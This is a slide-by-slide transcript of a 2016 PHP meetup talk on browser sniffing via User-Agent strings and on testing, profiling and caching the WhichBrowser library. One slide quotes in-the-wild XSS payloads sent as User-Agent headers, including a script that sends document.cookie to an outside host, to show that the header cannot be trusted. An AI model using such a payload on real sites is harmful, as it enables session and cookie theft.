Everybody Lies – The story behind WhichBrowser

A presentation at GroningenPHP in April 2016 in Groningen, Netherlands by Niels Leenheer

Slide 1

Slide 1

everybody lies GroningenPHP, April 7th 2016

Slide 2

Slide 2

Slide 3

Slide 3

Slide 4

Slide 4

Slide 5

Slide 5

Slide 6

Slide 6

1 Browser sniffing explained

Slide 7

Slide 7

why a talk about browser sniffing?

Slide 8

Slide 8

browser sniffing is dirty

Slide 9

Slide 9

you should use feature detection

Slide 10

Slide 10

why a talk about browser sniffing?

Slide 11

Slide 11

Slide 12

Slide 12

what is browser sniffing?

Slide 13

Slide 13

The HTTP specification defines the User-Agent header. It contains a string with information about the browser.

Slide 14

Slide 14

Every request the browser makes to the server includes the User-Agent header

Slide 15

Slide 15

GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net

Slide 16

Slide 16

GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net HTTP/1.1 200 OK Date: Mon, 08 Feb 2016 10:40:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT ETag: "984-50cae11796432" Accept-Ranges: bytes Content-Length: 2436 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <!doctype html> <html>

Slide 17

Slide 17

You can use the User-Agent string to identify: the browser the rendering engine the operating system the device model and more

Slide 18

Slide 18

what is browser sniffing good for?

Slide 19

Slide 19

improve ux if you know the platform or browser, you can streamline the user experience

Slide 20

Slide 20

Slide 21

Slide 21

analytics if you know your users, you can build a better site for them

Slide 22

Slide 22

error logging if you know which browser is causing problems, you can fix them

Slide 23

Slide 23

Slide 24

Slide 24

Slide 25

Slide 25

why is browser sniffing hard?

Slide 26

Slide 26

things started out simple

Slide 27

Slide 27

Mosaic Mosaic/1.0 (Win3.1) The name of the browser The version of the browser Operating system

Slide 28

Slide 28

Netscape Navigator Mozilla/1.0 (Win3.1) The code name of the browser The version of the browser Operating system

Slide 29

Slide 29

but it quickly started to get complicated

Slide 30

Slide 30

Internet Explorer Mozilla/1.0 (compatible; MSIE 1.0; Windows 95) The name of the browser Compatible with Netscape Navigator 1.0 The version of the browser Operating system

Slide 31

Slide 31

Opera Opera/8.54 (Windows 95; U; en) The name of the browser The version of the browser Operating system English language United States level encryption

Slide 32

Slide 32

Opera Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0 The name of the browser The version of the browser Rendering engine

Slide 33

Slide 33

Opera Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10 The name of the browser Fake version of the browser Real version of the browser

Slide 34

Slide 34

Firefox Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.12) Gecko/20090706 Firefox/3.0.12 The name of the rendering engine The name of the browser Build date of the rendering engine Version of the browser Version of the rendering engine

Slide 35

Slide 35

Firefox Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0 Build date is no longer updated

Slide 36

Slide 36

Firefox Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0

Slide 37

Slide 37

and it gets worse…

Slide 38

Slide 38

Safari Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3 The name of the browser Version of the browser

Slide 39

Slide 39

Chrome Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3 The name of the browser Version of the browser

Slide 40

Slide 40

Opera Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180 The name of the browser Version of the browser

Slide 41

Slide 41

Internet Explorer Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Version of the browser

Slide 42

Slide 42

Edge Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162 The name of the browser Version of the browser

Slide 43

Slide 43

and those were all relatively normal User-Agent strings

Slide 44

Slide 44

“User-Agent strings only get larger over time, never smaller” Niels’s law of User-Agent strings

Slide 45

Slide 45

Samsung Internet Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/ 28.0.1500.94 Mobile Safari/537.36 Samsung device Version of the browser

Slide 46

Slide 46

Nokia Xpress for Windows Phone Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5

Slide 47

Slide 47

LG Netcast Mozilla/5.0 (X11; Linux; ko-KR) AppleWebKit/534.26+ (KHTML, like Gecko) Version/5.0 Safari/534.26+

Slide 48

Slide 48

Sometimes browsers include a compatibility mode, or desktop mode which deliberately changes the User-Agent string

Slide 49

Slide 49

Opera Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser The name of the operating system Version of the browser

Slide 50

Slide 50

Opera Mobile (desktop mode) Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser ROT 13 encrypted “mobi“ Version of the browser

Slide 51

Slide 51

Internet Explorer Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Browser version

Slide 52

Slide 52

Internet Explorer (compatibility view) Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Trident 5 means it’s Internet Explorer 9

Slide 53

Slide 53

And it is possible to change the User-Agent string yourself

Slide 54

Slide 54

spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)

Slide 55

Slide 55

XSS attacks

<script>alert("My Little Pony”);</script> <script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script> <img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony”>

Slide 56

Slide 56

XSS attacks

Slide 57

Slide 57

funny people Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit) Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko) ( °□°

Slide 58

Slide 58

angry people

Slide 59

Slide 59

angry people FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62 Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.

Slide 60

Slide 60

User-Agent strings cannot be trusted!

Slide 61

Slide 61

Everybody lies

Slide 62

Slide 62

you should never use browser sniffing for controlling access to your website

Slide 63

Slide 63

you should never use browser sniffing for determining browser capabilities

Slide 64

Slide 64

you should never build your own browser sniffing library

Slide 65

Slide 65

2 Creating my own browser sniffing library

Slide 66

Slide 66

Slide 67

Slide 67

Slide 68

Slide 68

Slide 69

Slide 69

open source

Slide 70

Slide 70

PHP 5.4 and up including PHP 7 and HHVM

Slide 71

Slide 71

12.500 lines of code

Slide 72

Slide 72

100% code coverage 5000+ individual tests

Slide 73

Slide 73

device database with 36.000 entries

Slide 74

Slide 74

psr-1 and psr-2 coding style

Slide 75

Slide 75

psr-4 autoloading

Slide 76

Slide 76

psr-6 caching interface

Slide 77

Slide 77

Slide 78

Slide 78

1 How to maintain quality?

Slide 79

Slide 79

testing of course!

Slide 80

Slide 80

What tools do we use?

Slide 81

Slide 81

PHP CodeSniffer

Slide 82

Slide 82

PHP CodeSniffer Check if your code follows coding standards

Slide 83

Slide 83

PHPUnit

Slide 84

Slide 84

PHPUnit Very good for testing the code that defines the public apis

Slide 85

Slide 85

PHPUnit But not so good for testing the actual browser detection

Slide 86

Slide 86

Testrunner

Slide 87

Slide 87

Testrunner Very lean framework for testing browser sniffing

Slide 88

Slide 88

Testrunner YAML files that contain a list of user agent strings and the expected results

Slide 89

Slide 89

Testrunner No coding required Just add a new user agent string and automatically generate the expected results

Slide 90

Slide 90

Continuous integration?

Slide 91

Slide 91

Yes, please!

Slide 92

Slide 92

Slide 93

Slide 93

Automatically start up virtual machines that run your whole test suite after every commit

Slide 94

Slide 94

Automatic testing of your code in multiple versions of PHP

Slide 95

Slide 95

Automatic checking of pull requests with feedback directly in Github

Slide 96

Slide 96

.travis.yml language: php php: - 5.4 - 5.5 - 5.6 - 7.0 - hhvm before_script: - composer self-update - composer update --ignore-platform-reqs --prefer-source script: - vendor/bin/phpcs --standard=PSR1,PSR2 -n src - php bin/runner.php --coverage --show check - vendor/bin/phpunit --coverage-clover phpunit.xml after_script: - travis_retry php vendor/bin/coveralls -v

Slide 97

Slide 97

Slide 98

Slide 98

Check if your tests cover all of your source code

Slide 99

Slide 99

Coverage information is generated by PHPUnit and Testrunner

Slide 100

Slide 100

Slide 101

Slide 101

Generating code coverage

Slide 102

Slide 102

Requires Xdebug or phpdbg

Slide 103

Slide 103

Common format is Clover XML

Slide 104

Slide 104

PHPUnit supports generating coverage as Clover XML phpunit --coverage-clover phpunit.xml

Slide 105

Slide 105

For testrunner we need to convert raw Xdebug or phpdbg coverage data to Clover XML

Slide 106

Slide 106

There is a package for that! phpunit/php-code-coverage composer require phpunit/php-code-coverage $coverage = new PHP_CodeCoverage; $coverage->filter()->addDirectoryToWhitelist('src'); $coverage->start('Testrunner'); // run your tests $coverage->stop(); $writer = new PHP_CodeCoverage_Report_Clover; $writer->process($coverage, 'runner.xml');

Slide 107

Slide 107

Slide 108

Slide 108

2 How to make it faster!

Slide 109

Slide 109

profiling of course!

Slide 110

Slide 110

WhichBrowser used to be 4 times slower than it’s competitors

Slide 111

Slide 111

UA Parser Piwik WhichBrowser Wurlf Browscaps average parsing time (ms) source: http://thadafinser.github.io/UserAgentParserComparison/

Slide 112

Slide 112

Why?

Slide 113

Slide 113

Use Xdebug and QCacheGrind

Slide 114

Slide 114

Xdebug has an option to create performance profiles zend_extension="/usr/local/opt/php70-xdebug/xdebug.so" xdebug.profiler_enable=1

Slide 115

Slide 115

View performance profiles in QCacheGrind

Slide 116

Slide 116

Slide 117

Slide 117

Slide 118

Slide 118

65% of time was spend in DeviceModels::identify()

Slide 119

Slide 119

65% of time was spend looking through the device database

Slide 120

Slide 120

65% of time was spend iterating over huge arrays

Slide 121

Slide 121

DeviceModels::$ANDROID_MODELS = [ … 'GT-I92(20|28)!' 'GT-I92(30|35)!' 'GT-I9250' 'GT-I92(60|68)!' 'GT-I9295' 'GT-I93(00|03|05|08)!' 'GT-I93(01)!' 'GT-I95(00|05|07)!' 'GT-I95(02|08)!' 'GT-I95(06)!' … ]; => => => => => => => => => => [ [ [ [ [ [ [ [ [ [ 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy Note' ], Golden' ], Nexus' ], Premier' ], S4 Active' ], S III' ], S3 Neo' ], S4' ], S4 Duos' ], S4 Advance' ],

Slide 122

Slide 122

'GT-I93(00|03|05|08)!'

Slide 123

Slide 123

"/^GT-I93(00|03|05|08)/i"

Slide 124

Slide 124

Why not a real database?

Slide 125

Slide 125

Easy editing, easy deployment

Slide 126

Slide 126

Order in the file matters

Slide 127

Slide 127

Why a PHP file?

Slide 128

Slide 128

No need to parse JSON or YAML

Slide 129

Slide 129

The whole database can be cached by the opcode cache

Slide 130

Slide 130

But you do need to iterate over every single item in that array until you have a match

Slide 131

Slide 131

Why not create an index?

Slide 132

Slide 132

You can’t create an index for regular expressions :-(

Slide 133

Slide 133

Or can you?

Slide 134

Slide 134

No, you can’t!

Slide 135

Slide 135

If only we could determine all possible matches for a regular expression…

Slide 136

Slide 136

1 All regular expressions are fixed to the start of the string

Slide 137

Slide 137

2 The shorter the index, the easier it is to find the matching strings

Slide 138

Slide 138

The ideal index length was 2 or 3 characters 1 2 3 4

Slide 139

Slide 139

We can do that!

Slide 140

Slide 140

/^GT-I93(00|03|05|08)/i GT

Slide 141

Slide 141

/^(SHP-)?(SHARP )?SH[0-9]{2,3}/i SH

Slide 142

Slide 142

/^(MEDION|(MD )?LIFETAB)/i ME, MD, LI

Slide 143

Slide 143

/^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i LE, ID, K0, K1, K2, K3, K4, K…

Slide 144

Slide 144

/^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i LE, ID, “complex list”

Slide 145

Slide 145

Can we do this in PHP?

Slide 146

Slide 146

There is a package for that! icomefromthenet/reverse-regex composer require icomefromthenet/reverse-regex use ReverseRegex\Lexer; $lexer = new Lexer($regexp); $lexer->moveNext(); if ($lexer->isNextTokenAny([ Lexer::T_LITERAL_CHAR,Lexer::T_LITERAL_NUMERIC ])) { … } else if ($lexer->isNextToken(Lexer::T_CHOICE_BAR)) { … } else if ($lexer->isNextToken(Lexer::T_GROUP_OPEN)) { … } else if ($lexer->isNextToken(Lexer::T_GROUP_CLOSE)) { …

Slide 147

Slide 147

Generate keys from a regular expression in just 100 lines of code

Slide 148

Slide 148

DeviceModels::$ANDROID_INDEX = [ … '@HW' => array ( 0 => '(HW-|HUAWEI )?(TIT|TAG)!!', 1 => '(HW-|HUAWEI |HONOR )?(ATH|CHE|CHM|HN3|H30|H60|HOL|KIW|PE|PLK|SCL)!!', 2 => '(HW-|HUAWEI )?(CHC|KII)!!', 3 => '(HW-|HUAWEI )?(ALE|D2|G6|G7|GRA|M100|P2|P6|P7|RIO|SC|Sophia)!!', 4 => '(Huawei|Ascend|HW-)!!', 5 => 'HW-01E', 6 => 'HW-03E', ), … ];

Slide 149

Slide 149

Looking up an android device (without index) 1✕ foreach($data as $item) 15.000 ✕ preg_match($item, $model) $item === $model 1✕ return $item or

Slide 150

Slide 150

Looking up an android device (with index) 1✕ $i = $index[substr(0,2,$model)] 1✕ foreach($i as $item) 1 - 100 ✕ preg_match($item, $model) $item === $model 1✕ return $data[$item] or

Slide 151

Slide 151

Slide 152

Slide 152

Slide 153

Slide 153

UA Parser Piwik Whichbrowser Wurlf Browscaps average parsing time (ms) source: http://thadafinser.github.io/UserAgentParserComparison/

Slide 154

Slide 154

But wait…

Slide 155

Slide 155

Slide 156

Slide 156

Slide 157

Slide 157

Again lists of regular expressions, but with no possible way to create an index

Slide 158

Slide 158

Multiple calls to preg_match with simple regular expressions

Slide 159

Slide 159

if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { … } if (preg_match(‘/Xbox One/u', $ua)) { …

Slide 160

Slide 160

preg_match is fast

Slide 161

Slide 161

But it has a bit of overhead

Slide 162

Slide 162

Replace multiple calls with a single call to reduce overhead

Slide 163

Slide 163

if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { … } if (preg_match(‘/Xbox One/u', $ua)) { …

Slide 164

Slide 164

if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { …

Slide 165

Slide 165

if (!preg_match(‘/(Nintendo|Nitro|PlayStation|PS[0-9]|Sega|Dreamcast|Xbox)/ui’, $ua)) { return; } if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { …

Slide 166

Slide 166

We still do the individual checks, but only if we are certain there is a match

Slide 167

Slide 167

Slide 168

Slide 168

Slide 169

Slide 169

UA Parser Piwik Whichbrowser Wurlf Browscaps average parsing time (ms) source: http://thadafinser.github.io/UserAgentParserComparison/

Slide 170

Slide 170

On par with others, but with a massive device database

Slide 171

Slide 171

Slide 172

Slide 172

3 How to make it even faster

Slide 173

Slide 173

3 How to make it even faster-der!

Slide 174

Slide 174

caching of course!

Slide 175

Slide 175

A common use case of WhichBrowser is call it from all pages of your website

Slide 176

Slide 176

Instead of analysing every page view you can do it once and reuse that result

Slide 177

Slide 177

memcached redis xcache couchbase apc mongodb filesystem zend data cache wincache

Slide 178

Slide 178

An universal caching API

Slide 179

Slide 179

PSR-6

Slide 180

Slide 180

Memcached // Initialise the Memcached client $client = new \Memcached(); $client->addServer('localhost', 11211); // Retrieve our data $data = $client->get($id); if ($client->getResultCode() === Memcached::RES_NOTFOUND) { $data = … $client->set($id, $data); }

Slide 181

Slide 181

Memcached using a PSR-6 cache adapter // Initialise the Memcached client $client = new \Memcached(); $client->addServer('localhost', 11211); // Initialise our storage pool $pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client); // Retrieve our data $item = $pool->getItem($id); if ($item->isHit()) { $data = $item->get()); } else { $data = … $item->set($data); $pool->save($item); }

Slide 182

Slide 182

Redis using a PSR-6 cache adapter // Initialise the Redis client $client = new \Redis(); $client->connect('localhost', 6379); // Initialise our storage pool $pool = new \Cache\Adapter\Redis\RedisCachePool($client); // Retrieve our data $item = $pool->getItem($id); if ($item->isHit()) { $data = $item->get()); } else { $data = … $item->set($data); $pool->save($item); }

Slide 183

Slide 183

Install adapters for the storage method you want

Slide 184

Slide 184

Set up the storage pool and give it to WhichBrowser

Slide 185

Slide 185

WhichBrowser without caching // Analyse the user agent string $result = new WhichBrowser\Parser(); $result->analyse(getallheaders()); echo $result->toString();

Slide 186

Slide 186

WhichBrowser with Memcached caching // Initialise the Memcached client $client = new \Memcached(); $client->addServer('localhost', 11211); // Initialise our storage pool $pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client); // Analyse the user agent string $result = new WhichBrowser\Parser(); $result->setCache($pool); $result->analyse(getallheaders()); echo $result->toString();

Slide 187

Slide 187

Just 50 lines of code

Slide 188

Slide 188

Slide 189

Slide 189

1 Test everthing! 2 Profile everyting! 3 Cache everything!

Slide 190

Slide 190

4 Never, ever create your own browser sniffing library

Slide 191

Slide 191

Thank you!

Slide 192

Slide 192

Thank you!